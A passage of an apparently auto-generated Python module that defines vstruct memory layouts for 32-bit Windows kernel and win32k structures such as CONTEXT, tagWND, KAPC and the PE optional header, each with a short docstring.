        self.unused = v_uint32()
class tagDPISERVERINFO(vstruct.VStruct):
    """Vstruct layout of win32k ``tagDPISERVERINFO`` (DPI-related font metrics)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.gclBorder = v_uint32()
        self.hCaptionFont = v_ptr32()
        self.hMsgFont = v_ptr32()
        self.cxMsgFontChar = v_uint32()
        self.cyMsgFontChar = v_uint32()
        self.wMaxBtnSize = v_uint32()
class _unnamed_12876(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the Power IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SystemContext = v_uint32()
        self.Type = v_uint32()
        self.State = POWER_STATE()
        self.ShutdownType = v_uint32()
class HDC(vstruct.VStruct):
    """Opaque Windows ``HDC`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class CONTEXT(vstruct.VStruct):
    """Vstruct layout of Windows x86 ``CONTEXT`` (thread register context); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ContextFlags = v_uint32()
        self.Dr0 = v_uint32()
        self.Dr1 = v_uint32()
        self.Dr2 = v_uint32()
        self.Dr3 = v_uint32()
        self.Dr6 = v_uint32()
        self.Dr7 = v_uint32()
        self.FloatSave = FLOATING_SAVE_AREA()
        self.SegGs = v_uint32()
        self.SegFs = v_uint32()
        self.SegEs = v_uint32()
        self.SegDs = v_uint32()
        self.Edi = v_uint32()
        self.Esi = v_uint32()
        self.Ebx = v_uint32()
        self.Edx = v_uint32()
        self.Ecx = v_uint32()
        self.Eax = v_uint32()
        self.Ebp = v_uint32()
        self.Eip = v_uint32()
        self.SegCs = v_uint32()
        self.EFlags = v_uint32()
        self.Esp = v_uint32()
        self.SegSs = v_uint32()
        self.ExtendedRegisters = vstruct.VArray([ v_uint8() for i in xrange(512) ])
class AUX_ACCESS_DATA(vstruct.VStruct):
    """Vstruct layout of Windows ``AUX_ACCESS_DATA`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PrivilegesUsed = v_ptr32()
        self.GenericMapping = GENERIC_MAPPING()
        self.AccessesToAudit = v_uint32()
        self.MaximumAuditMask = v_uint32()
        self.TransactionId = GUID()
        self.NewSecurityDescriptor = v_ptr32()
        self.ExistingSecurityDescriptor = v_ptr32()
        self.ParentSecurityDescriptor = v_ptr32()
        self.DeRefSecurityDescriptor = v_ptr32()
        self.SDLock = v_ptr32()
        self.AccessReasons = ACCESS_REASONS()
class LIGATURE1(vstruct.VStruct):
    """Vstruct layout of keyboard-layout ``LIGATURE1`` (one-character ligature entry)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.VirtualKey = v_uint8()
        self._pad0002 = v_bytes(size=1)
        self.ModificationNumber = v_uint16()
        self.wch = vstruct.VArray([ v_uint16() for i in xrange(1) ])
class _unnamed_12586(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably a Create/CreatePipe IRP parameter arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityContext = v_ptr32()
        self.Options = v_uint32()
        self.Reserved = v_uint16()
        self.ShareAccess = v_uint16()
        self.Parameters = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH_SCALING_SUPPORT(vstruct.VStruct):
    """Vstruct layout of ``D3DKMDT_VIDPN_PRESENT_PATH_SCALING_SUPPORT`` (bitfields collapsed to one dword)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Identity = v_uint32()
class EVENT_DATA_DESCRIPTOR(vstruct.VStruct):
    """Vstruct layout of Windows ETW ``EVENT_DATA_DESCRIPTOR``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Ptr = v_uint64()
        self.Size = v_uint32()
        self.Reserved = v_uint32()
class IO_DRIVER_CREATE_CONTEXT(vstruct.VStruct):
    """Vstruct layout of Windows ``IO_DRIVER_CREATE_CONTEXT`` (32-bit); pad preserves alignment."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Size = v_uint16()
        self._pad0004 = v_bytes(size=2)
        self.ExtraCreateParameter = v_ptr32()
        self.DeviceObjectHint = v_ptr32()
        self.TxnParameters = v_ptr32()
class D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION(vstruct.VStruct):
    """Vstruct layout of ``D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CopyProtectionType = v_uint32()
        self.APSTriggerBits = v_uint32()
        self.OEMCopyProtection = vstruct.VArray([ v_uint8() for i in xrange(256) ])
        self.CopyProtectionSupport = D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_SUPPORT()
class HMONITOR(vstruct.VStruct):
    """Opaque Windows ``HMONITOR`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class EJOB(vstruct.VStruct):
    """Opaque placeholder for Windows ``EJOB``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class D3DKMDT_GAMMA_RAMP(vstruct.VStruct):
    """Vstruct layout of ``D3DKMDT_GAMMA_RAMP``; ``Data`` is the generated anonymous-union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint32()
        self.DataSize = v_uint32()
        self.Data = _unnamed_15886()
class VK_TO_BIT(vstruct.VStruct):
    """Vstruct layout of keyboard-layout ``VK_TO_BIT`` (virtual key to modifier-bit mapping)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Vk = v_uint8()
        self.ModBits = v_uint8()
class MODIFIERS(vstruct.VStruct):
    """Vstruct layout of keyboard-layout ``MODIFIERS``; zero-length array plus pad mirror the generated layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pVkToBit = v_ptr32()
        self.wMaxModBits = v_uint16()
        self.ModNumber = vstruct.VArray([ v_uint8() for i in xrange(0) ])
        self._pad0008 = v_bytes(size=2)
class KAPC(vstruct.VStruct):
    """Vstruct layout of Windows ``KAPC`` (asynchronous procedure call object, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint8()
        self.SpareByte0 = v_uint8()
        self.Size = v_uint8()
        self.SpareByte1 = v_uint8()
        self.SpareLong0 = v_uint32()
        self.Thread = v_ptr32()
        self.ApcListEntry = LIST_ENTRY()
        self.KernelRoutine = v_ptr32()
        self.RundownRoutine = v_ptr32()
        self.NormalRoutine = v_ptr32()
        self.NormalContext = v_ptr32()
        self.SystemArgument1 = v_ptr32()
        self.SystemArgument2 = v_ptr32()
        self.ApcStateIndex = v_uint8()
        self.ApcMode = v_uint8()
        self.Inserted = v_uint8()
        self._pad0030 = v_bytes(size=1)
class DMM_MONITOR_SOURCE_MODE_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_MONITOR_SOURCE_MODE_SERIALIZATION``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Info = D3DKMDT_MONITOR_SOURCE_MODE()
        self.TimingType = v_uint32()
class tagIMEINFOEX(vstruct.VStruct):
    """Vstruct layout of win32k ``tagIMEINFOEX`` (extended IME information, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hkl = v_ptr32()
        self.ImeInfo = tagIMEINFO()
        self.wszUIClass = vstruct.VArray([ v_uint16() for i in xrange(16) ])
        self.fdwInitConvMode = v_uint32()
        self.fInitOpen = v_uint32()
        self.fLoadFlag = v_uint32()
        self.dwProdVersion = v_uint32()
        self.dwImeWinVersion = v_uint32()
        self.wszImeDescription = vstruct.VArray([ v_uint16() for i in xrange(50) ])
        self.wszImeFile = vstruct.VArray([ v_uint16() for i in xrange(80) ])
        self.fSysWow64Only = v_uint32()
class tagWND(vstruct.VStruct):
    """Vstruct layout of win32k ``tagWND`` (kernel window object, 32-bit); field order fixes the binary layout."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.head = THRDESKHEAD()
        self.state = v_uint32()
        self.state2 = v_uint32()
        self.ExStyle = v_uint32()
        self.style = v_uint32()
        self.hModule = v_ptr32()
        self.hMod16 = v_uint16()
        self.fnid = v_uint16()
        self.spwndNext = v_ptr32()
        self.spwndPrev = v_ptr32()
        self.spwndParent = v_ptr32()
        self.spwndChild = v_ptr32()
        self.spwndOwner = v_ptr32()
        self.rcWindow = tagRECT()
        self.rcClient = tagRECT()
        self.lpfnWndProc = v_ptr32()
        self.pcls = v_ptr32()
        self.hrgnUpdate = v_ptr32()
        self.ppropList = v_ptr32()
        self.pSBInfo = v_ptr32()
        self.spmenuSys = v_ptr32()
        self.spmenu = v_ptr32()
        self.hrgnClip = v_ptr32()
        self.hrgnNewFrame = v_ptr32()
        self.strName = LARGE_UNICODE_STRING()
        self.cbwndExtra = v_uint32()
        self.spwndLastActive = v_ptr32()
        self.hImc = v_ptr32()
        self.dwUserData = v_uint32()
        self.pActCtx = v_ptr32()
        self.pTransform = v_ptr32()
        self.spwndClipboardListenerNext = v_ptr32()
        self.ExStyle2 = v_uint32()
class XSTATE_FEATURE(vstruct.VStruct):
    """Vstruct layout of Windows ``XSTATE_FEATURE`` (offset/size pair)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Offset = v_uint32()
        self.Size = v_uint32()
class _unnamed_12896(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the generic Others IRP parameter arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Argument1 = v_ptr32()
        self.Argument2 = v_ptr32()
        self.Argument3 = v_ptr32()
        self.Argument4 = v_ptr32()
class D3DDDI_GAMMA_RAMP_DXGI_1(vstruct.VStruct):
    """Vstruct layout of ``D3DDDI_GAMMA_RAMP_DXGI_1`` (scale/offset plus 1025-entry RGB curve)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Scale = D3DDDI_DXGI_RGB()
        self.Offset = D3DDDI_DXGI_RGB()
        self.GammaCurve = vstruct.VArray([ D3DDDI_DXGI_RGB() for i in xrange(1025) ])
class WHEA_TIMESTAMP(vstruct.VStruct):
    """Vstruct layout of Windows ``WHEA_TIMESTAMP`` (bitfields collapsed to one qword)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Seconds = v_uint64()
class ACTIVATION_CONTEXT(vstruct.VStruct):
    """Opaque placeholder for Windows ``ACTIVATION_CONTEXT``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class _unnamed_12891(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the WMI IRP parameter arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ProviderId = v_uint32()
        self.DataPath = v_ptr32()
        self.BufferSize = v_uint32()
        self.Buffer = v_ptr32()
class tagUAHMENUITEMMETRICS(vstruct.VStruct):
    """Vstruct layout of win32k ``tagUAHMENUITEMMETRICS``; trailing pad preserves struct size."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.rgsizeBar = vstruct.VArray([ tagSIZE() for i in xrange(2) ])
        self._pad0020 = v_bytes(size=16)
class KLIST_ENTRY(vstruct.VStruct):
    """Vstruct layout of a doubly linked list entry (``KLIST_ENTRY``)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flink = v_ptr32()
        self.Blink = v_ptr32()
class RTL_CRITICAL_SECTION_DEBUG(vstruct.VStruct):
    """Vstruct layout of Windows ``RTL_CRITICAL_SECTION_DEBUG`` (32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint16()
        self.CreatorBackTraceIndex = v_uint16()
        self.CriticalSection = v_ptr32()
        self.ProcessLocksList = LIST_ENTRY()
        self.EntryCount = v_uint32()
        self.ContentionCount = v_uint32()
        self.Flags = v_uint32()
        self.CreatorBackTraceIndexHigh = v_uint16()
        self.SpareUSHORT = v_uint16()
class DISPATCHER_HEADER(vstruct.VStruct):
    """Vstruct layout of Windows ``DISPATCHER_HEADER`` (kernel waitable-object header, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Type = v_uint8()
        self.TimerControlFlags = v_uint8()
        self.ThreadControlFlags = v_uint8()
        self.TimerMiscFlags = v_uint8()
        self.SignalState = v_uint32()
        self.WaitListHead = LIST_ENTRY()
class HBITMAP(vstruct.VStruct):
    """Opaque Windows ``HBITMAP`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class tagW32JOB(vstruct.VStruct):
    """Vstruct layout of win32k ``tagW32JOB`` (per-job win32k state, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pNext = v_ptr32()
        self.Job = v_ptr32()
        self.pAtomTable = v_ptr32()
        self.restrictions = v_uint32()
        self.uProcessCount = v_uint32()
        self.uMaxProcesses = v_uint32()
        self.ppiTable = v_ptr32()
        self.ughCrt = v_uint32()
        self.ughMax = v_uint32()
        self.pgh = v_ptr32()
class ASSEMBLY_STORAGE_MAP(vstruct.VStruct):
    """Opaque placeholder for Windows ``ASSEMBLY_STORAGE_MAP``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class tagMBSTRING(vstruct.VStruct):
    """Vstruct layout of win32k ``tagMBSTRING`` (message-box button string); pad preserves alignment."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.szName = vstruct.VArray([ v_uint16() for i in xrange(15) ])
        self._pad0020 = v_bytes(size=2)
        self.uID = v_uint32()
        self.uStr = v_uint32()
class POWER_SEQUENCE(vstruct.VStruct):
    """Vstruct layout of Windows ``POWER_SEQUENCE`` (D1/D2/D3 transition counters)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SequenceD1 = v_uint32()
        self.SequenceD2 = v_uint32()
        self.SequenceD3 = v_uint32()
class DMM_MONITORDESCRIPTOR_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_MONITORDESCRIPTOR_SERIALIZATION`` (128-byte raw descriptor blob)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Id = v_uint32()
        self.Type = v_uint32()
        self.Origin = v_uint32()
        self.Data = vstruct.VArray([ v_uint8() for i in xrange(128) ])
class DESCRIPTOR(vstruct.VStruct):
    """Vstruct layout of x86 ``DESCRIPTOR`` (GDTR/IDTR-style limit/base pair with leading pad word)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Pad = v_uint16()
        self.Limit = v_uint16()
        self.Base = v_uint32()
class PROCDESKHEAD(vstruct.VStruct):
    """Vstruct layout of win32k ``PROCDESKHEAD`` (process/desktop object header)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.h = v_ptr32()
        self.cLockObj = v_uint32()
        self.hTaskWow = v_uint32()
        self.rpdesk = v_ptr32()
        self.pSelf = v_ptr32()
class SM_VALUES_STRINGS(vstruct.VStruct):
    """Vstruct layout of ``SM_VALUES_STRINGS`` (named value with range/storage type)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pszName = v_ptr32()
        self.ulValue = v_uint32()
        self.RangeType = v_uint32()
        self.StorageType = v_uint32()
class HBRUSH(vstruct.VStruct):
    """Opaque Windows ``HBRUSH`` handle modeled as a single 32-bit value."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.unused = v_uint32()
class SECURITY_QUALITY_OF_SERVICE(vstruct.VStruct):
    """Vstruct layout of Windows ``SECURITY_QUALITY_OF_SERVICE``; trailing pad preserves struct size."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.ImpersonationLevel = v_uint32()
        self.ContextTrackingMode = v_uint8()
        self.EffectiveOnly = v_uint8()
        self._pad000c = v_bytes(size=2)
class _unnamed_12471(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); wraps the Create parameter arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Create = _unnamed_12558()
class WHEA_ERROR_RECORD(vstruct.VStruct):
    """Vstruct layout of Windows ``WHEA_ERROR_RECORD``; descriptor array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Header = WHEA_ERROR_RECORD_HEADER()
        self.SectionDescriptor = vstruct.VArray([ WHEA_ERROR_RECORD_SECTION_DESCRIPTOR() for i in xrange(1) ])
class LUID(vstruct.VStruct):
    """Vstruct layout of Windows ``LUID`` (locally unique identifier)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.LowPart = v_uint32()
        self.HighPart = v_uint32()
class tagDESKTOP(vstruct.VStruct):
    """Vstruct layout of win32k ``tagDESKTOP`` (kernel desktop object, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.dwSessionId = v_uint32()
        self.pDeskInfo = v_ptr32()
        self.pDispInfo = v_ptr32()
        self.rpdeskNext = v_ptr32()
        self.rpwinstaParent = v_ptr32()
        self.dwDTFlags = v_uint32()
        self.dwDesktopId = v_uint32()
        self.spmenuSys = v_ptr32()
        self.spmenuDialogSys = v_ptr32()
        self.spmenuHScroll = v_ptr32()
        self.spmenuVScroll = v_ptr32()
        self.spwndForeground = v_ptr32()
        self.spwndTray = v_ptr32()
        self.spwndMessage = v_ptr32()
        self.spwndTooltip = v_ptr32()
        self.hsectionDesktop = v_ptr32()
        self.pheapDesktop = v_ptr32()
        self.ulHeapSize = v_uint32()
        self.cciConsole = CONSOLE_CARET_INFO()
        self.PtiList = LIST_ENTRY()
        self.spwndTrack = v_ptr32()
        self.htEx = v_uint32()
        self.rcMouseHover = tagRECT()
        self.dwMouseHoverTime = v_uint32()
        self.pMagInputTransform = v_ptr32()
class tagPOOLRECORD(vstruct.VStruct):
    """Vstruct layout of win32k ``tagPOOLRECORD`` (pool allocation trace record)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.ExtraData = v_ptr32()
        self.size = v_uint32()
        self.trace = vstruct.VArray([ v_ptr32() for i in xrange(6) ])
class CLIENT_ID(vstruct.VStruct):
    """Vstruct layout of Windows ``CLIENT_ID`` (process/thread id pair)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.UniqueProcess = v_ptr32()
        self.UniqueThread = v_ptr32()
class OBJECT_DUMP_CONTROL(vstruct.VStruct):
    """Vstruct layout of Windows ``OBJECT_DUMP_CONTROL``."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Stream = v_ptr32()
        self.Detail = v_uint32()
class _unnamed_15793(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); generic resource-range union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Generic = _unnamed_16064()
class _unnamed_16610(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); length/alignment plus address range."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length40 = v_uint32()
        self.Alignment40 = v_uint32()
        self.MinimumAddress = LARGE_INTEGER()
        self.MaximumAddress = LARGE_INTEGER()
class _unnamed_16615(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); length/alignment plus address range."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length48 = v_uint32()
        self.Alignment48 = v_uint32()
        self.MinimumAddress = LARGE_INTEGER()
        self.MaximumAddress = LARGE_INTEGER()
class tagSPB(vstruct.VStruct):
    """Vstruct layout of win32k ``tagSPB`` (saved popup bits, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pspbNext = v_ptr32()
        self.spwnd = v_ptr32()
        self.hbm = v_ptr32()
        self.rc = tagRECT()
        self.hrgn = v_ptr32()
        self.flags = v_uint32()
        self.ulSaveId = v_uint32()
class DMM_VIDPNSET_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_VIDPNSET_SERIALIZATION``; offset array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumVidPns = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.VidPnOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class STRING(vstruct.VStruct):
    """Vstruct layout of Windows ANSI ``STRING`` (counted string, 32-bit)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint16()
        self.MaximumLength = v_uint16()
        self.Buffer = v_ptr32()
class TP_POOL(vstruct.VStruct):
    """Opaque placeholder for Windows ``TP_POOL``; no fields were emitted by the generator."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class tagPROP(vstruct.VStruct):
    """Vstruct layout of win32k ``tagPROP`` (window property entry)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.hData = v_ptr32()
        self.atomKey = v_uint16()
        self.fs = v_uint16()
class _unnamed_12822(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); device-text query parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DeviceTextType = v_uint32()
        self.LocaleId = v_uint32()
class LIST_ENTRY32(vstruct.VStruct):
    """Vstruct layout of Windows ``LIST_ENTRY32`` (explicit 32-bit doubly linked list entry)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Flink = v_uint32()
        self.Blink = v_uint32()
class SINGLE_LIST_ENTRY(vstruct.VStruct):
    """Vstruct layout of Windows ``SINGLE_LIST_ENTRY`` (singly linked list entry)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Next = v_ptr32()
class KDEVICE_QUEUE_ENTRY(vstruct.VStruct):
    """Vstruct layout of Windows ``KDEVICE_QUEUE_ENTRY``; trailing pad preserves struct size."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.DeviceListEntry = LIST_ENTRY()
        self.SortKey = v_uint32()
        self.Inserted = v_uint8()
        self._pad0010 = v_bytes(size=3)
class D3DKMDT_VIDPN_SOURCE_MODE(vstruct.VStruct):
    """Vstruct layout of ``D3DKMDT_VIDPN_SOURCE_MODE``; ``Format`` is the generated anonymous-union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Id = v_uint32()
        self.Type = v_uint32()
        self.Format = _unnamed_13381()
class _unnamed_12574(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably a Create IRP parameter arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.SecurityContext = v_ptr32()
        self.Options = v_uint32()
        self.Reserved = v_uint16()
        self.ShareAccess = v_uint16()
        self.Parameters = v_ptr32()
class tagCLIENTTHREADINFO(vstruct.VStruct):
    """Vstruct layout of win32k ``tagCLIENTTHREADINFO`` (per-thread wake/change bits)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.CTIF_flags = v_uint32()
        self.fsChangeBits = v_uint16()
        self.fsWakeBits = v_uint16()
        self.fsWakeBitsJournal = v_uint16()
        self.fsWakeMask = v_uint16()
        self.tickLastMsgChecked = v_uint32()
class tagKbdNlsLayer(vstruct.VStruct):
    """Vstruct layout of win32k ``tagKbdNlsLayer`` (NLS keyboard layer tables)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.OEMIdentifier = v_uint16()
        self.LayoutInformation = v_uint16()
        self.NumOfVkToF = v_uint32()
        self.pVkToF = v_ptr32()
        self.NumOfMouseVKey = v_uint32()
        self.pusMouseVKey = v_ptr32()
class _unnamed_12654(vstruct.VStruct):
    """Anonymous embedded member (generated synthetic name); presumably the QueryDirectory IRP parameters."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Length = v_uint32()
        self.FileName = v_ptr32()
        self.FileInformationClass = v_uint32()
        self.FileIndex = v_uint32()
class KSPIN_LOCK_QUEUE(vstruct.VStruct):
    """Vstruct layout of Windows ``KSPIN_LOCK_QUEUE`` (queued spin-lock node)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Next = v_ptr32()
        self.Lock = v_ptr32()
class tagPROCESS_HID_TABLE(vstruct.VStruct):
    """Vstruct layout of win32k ``tagPROCESS_HID_TABLE`` (per-process raw-input HID registrations)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.link = LIST_ENTRY()
        self.InclusionList = LIST_ENTRY()
        self.UsagePageList = LIST_ENTRY()
        self.ExclusionList = LIST_ENTRY()
        self.spwndTargetMouse = v_ptr32()
        self.spwndTargetKbd = v_ptr32()
        self.nSinks = v_uint32()
        self.pLastRequest = v_ptr32()
        self.UsagePageLast = v_uint16()
        self.UsageLast = v_uint16()
        self.fRawMouse = v_uint32()
class WHEA_ERROR_PACKET_FLAGS(vstruct.VStruct):
    """Vstruct layout of Windows ``WHEA_ERROR_PACKET_FLAGS`` (bitfields collapsed to one dword)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PreviousError = v_uint32()
class IO_RESOURCE_DESCRIPTOR(vstruct.VStruct):
    """Vstruct layout of Windows ``IO_RESOURCE_DESCRIPTOR``; ``u`` is the generated union arm."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Option = v_uint8()
        self.Type = v_uint8()
        self.ShareDisposition = v_uint8()
        self.Spare1 = v_uint8()
        self.Flags = v_uint16()
        self.Spare2 = v_uint16()
        self.u = _unnamed_16049()
class EX_PUSH_LOCK_CACHE_AWARE(vstruct.VStruct):
    """Vstruct layout of Windows ``EX_PUSH_LOCK_CACHE_AWARE``; lock array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Locks = vstruct.VArray([ v_ptr32() for i in xrange(1) ])
class tagMLIST(vstruct.VStruct):
    """Vstruct layout of win32k ``tagMLIST`` (message list head/tail plus count)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.pqmsgRead = v_ptr32()
        self.pqmsgWriteLast = v_ptr32()
        self.cMsgs = v_uint32()
class DMM_MONITORDESCRIPTORSET_SERIALIZATION(vstruct.VStruct):
    """Vstruct layout of ``DMM_MONITORDESCRIPTORSET_SERIALIZATION``; descriptor array modeled with one element."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.NumDescriptors = v_uint8()
        self._pad0004 = v_bytes(size=3)
        self.DescriptorSerialization = vstruct.VArray([ DMM_MONITORDESCRIPTOR_SERIALIZATION() for i in xrange(1) ])
class tagCLIP(vstruct.VStruct):
    """Vstruct layout of win32k ``tagCLIP`` (clipboard format entry)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.fmt = v_uint32()
        self.hData = v_ptr32()
        self.fGlobalHandle = v_uint32()
class tagSMS(vstruct.VStruct):
    """Sent-message structure: sender/receiver thread links, callback info,
    and the message payload (wParam/lParam/message/spwnd).

    Field order defines the binary layout; do not reorder.
    """
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.psmsNext = v_ptr32()
        self.psmsReceiveNext = v_ptr32()
        self.ptiSender = v_ptr32()
        self.ptiReceiver = v_ptr32()
        self.lpResultCallBack = v_ptr32()
        self.dwData = v_uint32()
        self.ptiCallBackSender = v_ptr32()
        self.lRet = v_uint32()
        self.tSent = v_uint32()
        self.flags = v_uint32()
        self.wParam = v_uint32()
        self.lParam = v_uint32()
        self.message = v_uint32()
        self.spwnd = v_ptr32()
        self.pvCapture = v_ptr32()
class IMAGE_OPTIONAL_HEADER(vstruct.VStruct):
    """PE32 optional header (32-bit variant — has BaseOfData, 32-bit
    ImageBase and stack/heap sizes) ending in 16 data directories."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Magic = v_uint16()
        self.MajorLinkerVersion = v_uint8()
        self.MinorLinkerVersion = v_uint8()
        self.SizeOfCode = v_uint32()
        self.SizeOfInitializedData = v_uint32()
        self.SizeOfUninitializedData = v_uint32()
        self.AddressOfEntryPoint = v_uint32()
        self.BaseOfCode = v_uint32()
        self.BaseOfData = v_uint32()
        self.ImageBase = v_uint32()
        self.SectionAlignment = v_uint32()
        self.FileAlignment = v_uint32()
        self.MajorOperatingSystemVersion = v_uint16()
        self.MinorOperatingSystemVersion = v_uint16()
        self.MajorImageVersion = v_uint16()
        self.MinorImageVersion = v_uint16()
        self.MajorSubsystemVersion = v_uint16()
        self.MinorSubsystemVersion = v_uint16()
        self.Win32VersionValue = v_uint32()
        self.SizeOfImage = v_uint32()
        self.SizeOfHeaders = v_uint32()
        self.CheckSum = v_uint32()
        self.Subsystem = v_uint16()
        self.DllCharacteristics = v_uint16()
        self.SizeOfStackReserve = v_uint32()
        self.SizeOfStackCommit = v_uint32()
        self.SizeOfHeapReserve = v_uint32()
        self.SizeOfHeapCommit = v_uint32()
        self.LoaderFlags = v_uint32()
        self.NumberOfRvaAndSizes = v_uint32()
        self.DataDirectory = vstruct.VArray([ IMAGE_DATA_DIRECTORY() for i in xrange(16) ])
class _unnamed_12786(vstruct.VStruct):
    """Anonymous embedded structure: a single Capabilities pointer."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Capabilities = v_ptr32()
class ETHREAD(vstruct.VStruct):
    """Opaque placeholder: generator emitted no fields for this type."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
class FAST_MUTEX(vstruct.VStruct):
    """Fast mutex: count/owner/contention plus an embedded KEVENT."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Count = v_uint32()
        self.Owner = v_ptr32()
        self.Contention = v_uint32()
        self.Event = KEVENT()
        self.OldIrql = v_uint32()
class WHEA_ERROR_RECORD_HEADER_VALIDBITS(vstruct.VStruct):
    """WHEA record-header valid-bits word (bitfields collapsed to uint32)."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.PlatformId = v_uint32()
class D3DKMDT_VIDPN_PRESENT_PATH_TRANSFORMATION(vstruct.VStruct):
    """VidPN present-path transform: scaling and rotation plus their
    support-flag sub-structures."""
    def __init__(self):
        vstruct.VStruct.__init__(self)
        self.Scaling = v_uint32()
        self.ScalingSupport = D3DKMDT_VIDPN_PRESENT_PATH_SCALING_SUPPORT()
        self.Rotation = v_uint32()
